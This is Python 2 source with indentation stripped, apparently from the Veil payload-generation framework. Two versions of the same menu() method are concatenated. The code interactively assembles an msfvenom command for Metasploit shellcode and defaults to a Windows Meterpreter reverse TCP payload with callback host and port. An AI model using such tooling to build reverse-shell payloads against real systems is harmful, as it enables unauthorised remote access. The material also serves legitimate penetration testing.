def menu(self):
"""
Main interactive menu for shellcode selection.
Utilizes Completer() to do tab completion on loaded metasploit payloads.
"""
payloadSelected = None
options = None
showMessage = False
if settings.TERMINAL_CLEAR != "false": showMessage = True
# if no generation method has been selected yet
if self.msfvenomCommand == "" and self.customshellcode == "":
# show banner?
if settings.TERMINAL_CLEAR != "false": showMessage = True
# prompt for custom shellcode or msfvenom
customShellcode = self.custShellcodeMenu(showMessage)
# if custom shellcode is specified, set it
if customShellcode:
self.customshellcode = customShellcode
# else, if no custom shellcode is specified, prompt for metasploit
else:
# instantiate our completer object for tab completion of available payloads
comp = completers.MSFCompleter(self.payloadTree)
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# have the user select the payload
while payloadSelected == None:
print '\n [*] Press %s for windows/meterpreter/reverse_tcp' % helpers.color('[enter]', yellow=True)
print ' [*] Press %s to list available payloads' % helpers.color('[tab]', yellow=True)
try:
payloadSelected = self.required_options['MSF_PAYLOAD'][0]
print ' [>] Please enter metasploit payload: %s' % (payloadSelected)
except:
payloadSelected = raw_input(' [>] Please enter metasploit payload: ').strip()
if payloadSelected == "":
# default to reverse_tcp for the payload
payloadSelected = "windows/meterpreter/reverse_tcp"
try:
parts = payloadSelected.split("/")
# walk down the selected parts of the payload tree to get to the options at the bottom
options = self.payloadTree
for part in parts:
options = options[part]
except KeyError:
# make sure user entered a valid payload
if 'PAYLOAD' in self.required_options: del self.required_options['PAYLOAD']
print helpers.color(" [!] ERROR: Invalid payload specified!\n", warning=True)
payloadSelected = None
# remove the tab completer
readline.set_completer(None)
# set the internal payload to the one selected
self.msfvenompayload = payloadSelected
# request a value for each required option
for option in options:
value = ""
while value == "":
### VALIDATION ###
# LHOST is a special case, so we can tab complete the local IP
if option == "LHOST":
try:
value = self.required_options['LHOST'][0]
print ' [>] Enter value for \'LHOST\', [tab] for local IP: %s' % (value)
except:
# set the completer to fill in the local IP
readline.set_completer(completers.IPCompleter().complete)
value = raw_input(' [>] Enter value for \'LHOST\', [tab] for local IP: ').strip()
if '.' in value:
hostParts = value.split(".")
if len(hostParts) > 1:
# if the last chunk is a number, assume it's an IP address
if hostParts[-1].isdigit():
# do a regex IP validation
if not re.match(r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$",value):
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad IP address specified.\n", warning=True)
value = ""
# otherwise assume we've been passed a domain name
else:
if not helpers.isValidHostname(value):
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad hostname specified.\n", warning=True)
value = ""
# if we don't have at least one period in the hostname/IP
else:
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
elif ':' in value:
try:
socket.inet_pton(socket.AF_INET6, value)
except socket.error:
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
else:
if 'LHOST' in self.required_options: del self.required_options['LHOST']
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
elif option == "LPORT":
try:
value = self.required_options['LPORT'][0]
print ' [>] Enter value for \'LPORT\': %s' % (value)
except:
# set the completer to fill in the default MSF port (4444)
readline.set_completer(completers.MSFPortCompleter().complete)
value = raw_input(' [>] Enter value for \'LPORT\': ').strip()
try:
if int(value) <= 0 or int(value) >= 65535:
print helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True)
if 'LPORT' in self.required_options: del self.required_options['LPORT']
value = ""
except ValueError:
print helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True)
if 'LPORT' in self.required_options: del self.required_options['LPORT']
value = ""
else:
value = raw_input(' [>] Enter value for \'' + option + '\': ').strip()
# append all the msfvenom options
self.msfvenomOptions.append(option + "=" + value)
# allow the user to input any extra OPTION=value pairs
extraValues = list()
while True:
# clear out the tab completion
readline.set_completer(completers.none().complete)
selection = raw_input(' [>] Enter any extra msfvenom options (syntax: OPTION1=value1 OPTION2=value2): ').strip()
if selection != "":
num_extra_options = selection.split(' ')
for xtra_opt in num_extra_options:
if xtra_opt is not '':
final_opt = xtra_opt.split('=')[0] + " " + xtra_opt.split('=')[1]
extraValues.append(final_opt)
else:
break
# grab any specified msfvenom options in the /etc/veil/settings.py file
msfvenomOptions = ""
if hasattr(settings, "MSFVENOM_OPTIONS"):
msfvenomOptions = settings.MSFVENOM_OPTIONS
# build out the msfvenom command
# TODO: detect Windows and modify the paths appropriately
self.msfvenomCommand = "msfvenom " + msfvenomOptions + " -p " + payloadSelected
for option in self.msfvenomOptions:
self.msfvenomCommand += " " + option
self.options.append(option)
if len(extraValues) != 0 :
self.msfvenomCommand += " " + " ".join(extraValues)
self.msfvenomCommand += " -b \'\\x00\\x0a\\xff\' -f c | tr -d \'\"\' | tr -d \'\n\'"
def menu(self):
"""
Main interactive menu for shellcode selection.
Utilizes Completer() to do tab completion on loaded metasploit payloads.
"""
payloadSelected = None
options = None
# if no generation method has been selected yet
if self.msfvenomCommand == "" and self.customshellcode == "":
# prompt for custom shellcode
customShellcode = self.custShellcodeMenu()
# if custom shellcode is specified, set it
if customShellcode:
self.customshellcode = customShellcode
# else, if no custom shellcode is specified, prompt for metasploit
else:
# instantiate our completer object for tab completion of available payloads
comp = completers.MSFCompleter(self.payloadTree)
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# have the user select the payload
while payloadSelected == None:
print '\n [*] Press [enter] for windows/meterpreter/reverse_tcp'
print ' [*] Press [tab] to list available payloads'
payloadSelected = raw_input(
' [>] Please enter metasploit payload: ').strip()
if payloadSelected == "":
# default to reverse_tcp for the payload
payloadSelected = "windows/meterpreter/reverse_tcp"
try:
parts = payloadSelected.split("/")
# walk down the selected parts of the payload tree to get to the options at the bottom
options = self.payloadTree
for part in parts:
options = options[part]
except KeyError:
# make sure user entered a valid payload
print helpers.color(
" [!] ERROR: Invalid payload specified!\n",
warning=True)
payloadSelected = None
# remove the tab completer
readline.set_completer(None)
# set the internal payload to the one selected
self.msfvenompayload = payloadSelected
# request a value for each required option
for option in options:
value = ""
while value == "":
### VALIDATION ###
# LHOST is a special case, so we can tab complete the local IP
if option == "LHOST":
# set the completer to fill in the local IP
readline.set_completer(
completers.IPCompleter().complete)
value = raw_input(
' [>] Enter value for \'LHOST\', [tab] for local IP: '
)
hostParts = value.split(".")
if len(hostParts) > 1:
# if the last chunk is a number, assume it's an IP address
if hostParts[-1].isdigit():
# do a regex IP validation
if not re.match(
r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$",
value):
print helpers.color(
"\n [!] ERROR: Bad IP address specified.\n",
warning=True)
value = ""
# otherwise assume we've been passed a domain name
else:
if not helpers.isValidHostname(value):
print helpers.color(
"\n [!] ERROR: Bad hostname specified.\n",
warning=True)
value = ""
# if we don't have at least one period in the hostname/IP
else:
print helpers.color(
"\n [!] ERROR: Bad IP address or hostname specified.\n",
warning=True)
value = ""
# LPORT validation
else:
# set the completer to fill in the default MSF port (4444)
readline.set_completer(
completers.MSFPortCompleter().complete)
value = raw_input(' [>] Enter value for \'' +
option + '\': ')
if option == "LPORT":
try:
if int(value) <= 0 or int(value) >= 65535:
print helpers.color(
" [!] ERROR: Bad port number specified.\n",
warning=True)
value = ""
except ValueError:
print helpers.color(
" [!] ERROR: Bad port number specified.\n",
warning=True)
value = ""
# append all the msfvenom options
self.msfvenomOptions.append(option + "=" + value)
# allow the user to input any extra OPTION=value pairs
extraValues = list()
while True:
selection = raw_input(
' [>] Enter extra msfvenom options in OPTION=value syntax: '
)
if selection != "":
extraValues.append(selection)
else:
break
# build out the msfvenom command
# TODO: detect Windows and modify the paths appropriately
self.msfvenomCommand = "msfvenom -p " + payloadSelected
for option in self.msfvenomOptions:
self.msfvenomCommand += " " + option
self.options.append(option)
if len(extraValues) != 0:
self.msfvenomCommand += " " + " ".join(extraValues)
self.msfvenomCommand += " -b \'\\x00\\x0a\\xff\' -f c | tr -d \'\"\' | tr -d \'\n\'"